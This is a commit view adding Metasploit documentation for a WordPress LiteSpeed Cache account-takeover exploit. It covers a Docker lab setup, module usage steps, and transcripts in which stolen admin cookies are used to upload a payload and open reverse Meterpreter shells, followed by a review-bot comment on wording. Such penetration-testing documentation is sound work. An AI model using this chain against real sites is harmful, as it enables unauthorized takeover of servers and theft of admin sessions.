forked from rapid7/metasploit-framework
Commit
1 parent dd5dd54, commit c80a03f. Showing 2 changed files with 215 additions and 82 deletions.
documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md (112 changes: 112 additions & 0 deletions)
@@ -0,0 +1,112 @@ | ||
## Vulnerable Application | ||
This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently | ||
has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging | ||
feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible | ||
without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies | ||
found in the debug.log can be used to upload and execute a malicious plugin containing a payload. | ||
|
||
### Setup | ||
Spin up a WordPress container with the following docker-compose file: | ||
```yml | ||
version: '3.8' | ||
|
||
services: | ||
db: | ||
image: mysql:latest | ||
volumes: | ||
- db_data:/var/lib/mysql | ||
restart: always | ||
environment: | ||
MYSQL_ROOT_PASSWORD: example_root_password | ||
MYSQL_DATABASE: wordpress | ||
MYSQL_USER: wordpress_user | ||
MYSQL_PASSWORD: example_password | ||
|
||
wordpress: | ||
depends_on: | ||
- db | ||
image: wordpress:latest | ||
ports: | ||
- "8000:80" # You can change the port as per your preference | ||
restart: always | ||
environment: | ||
WORDPRESS_DB_HOST: db:3306 | ||
WORDPRESS_DB_USER: wordpress_user | ||
WORDPRESS_DB_PASSWORD: example_password | ||
WORDPRESS_DB_NAME: wordpress | ||
volumes: | ||
- wordpress_data:/var/www/html | ||
|
||
volumes: | ||
db_data: | ||
wordpress_data: | ||
``` | ||
Download, install and activate the vulnerable LiteSpeed Cache plugin: https://downloads.wordpress.org/plugin/litespeed-cache.6.3.zip | ||
Once installed a LiteSpeed menu bar item should appear on the left hand side of the application. When clicked a drop down | ||
should appear. Select "ToolBox", then select "Debug Settings". Then switch the "Debug Log" feature to "On". | ||
Sign out of WordPress and when you reauthenticate your admin cookie will be logged to /wp-content/debug.log | ||
## Verification Steps | ||
1. Start msfconsole | ||
1. Do: `use multi/http/wp_litespeed_cookie_theft` | ||
1. Set the `RHOST`, `LHOST` and `RPORT` | ||
1. Run the module | ||
1. Receive a Meterpreter session in the context of the user running the WordPress site. | ||
|
||
## Scenarios | ||
### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3 | ||
``` | ||
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit | ||
[*] Reloading module... | ||
|
||
[*] Started reverse TCP handler on 192.168.1.67:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] One or more potential admin cookies were found | ||
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload | ||
[*] Preparing payload... | ||
[*] Uploading payload... | ||
[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php... | ||
[*] Sending stage (39927 bytes) to 192.168.1.67 | ||
[+] Deleted OiDynMUetY.php | ||
[+] Deleted qSNzhabMTP.php | ||
[+] Deleted ../qSNzhabMTP | ||
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700 | ||
|
||
meterpreter > getuid | ||
Server username: www-data | ||
meterpreter > sysinfo | ||
Computer : 29292f368fe3 | ||
OS : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64 | ||
Meterpreter : php/linux | ||
``` | ||
### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3 | ||
``` | ||
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit | ||
[*] Reloading module... | ||
|
||
[*] Started reverse TCP handler on 192.168.1.67:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] One or more potential admin cookies were found | ||
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload | ||
[*] Preparing payload... | ||
[*] Uploading payload... | ||
[*] Executing the payload at /wp-content/plugins/IVStOPtwuq/WvXecICkgw.php... | ||
[*] Sending stage (3045380 bytes) to 192.168.1.67 | ||
[+] Deleted WvXecICkgw.php | ||
[+] Deleted IVStOPtwuq.php | ||
[+] Deleted ../IVStOPtwuq | ||
[*] Meterpreter session 6 opened (192.168.1.67:4444 -> 192.168.1.67:64884) at 2024-09-11 23:14:49 -0700 | ||
|
||
meterpreter > getuid | ||
Server username: www-data | ||
meterpreter > sysinfo | ||
Computer : 172.22.0.3 | ||
OS : Debian 12.5 (Linux 6.10.4-linuxkit) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
``` |
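Review bot: the Verification Steps never select a target, yet the Scenarios section exercises two of them (ARCH_PHP and ARCH_CMD); add a step between setting `RHOST`, `LHOST` and `RPORT` and "Run the module" that chooses the target and a matching payload, so a reader can reproduce either scenario. Two smaller points in the same hunk: "Wordpress" in the first paragraph should be "WordPress", as the rest of the file spells it, and the last sentence of the Setup section ("... will be logged to /wp-content/debug.log") is missing its full stop. The scenario transcripts also use `rexploit` while the steps say "Run the module"; showing `run` would match the steps.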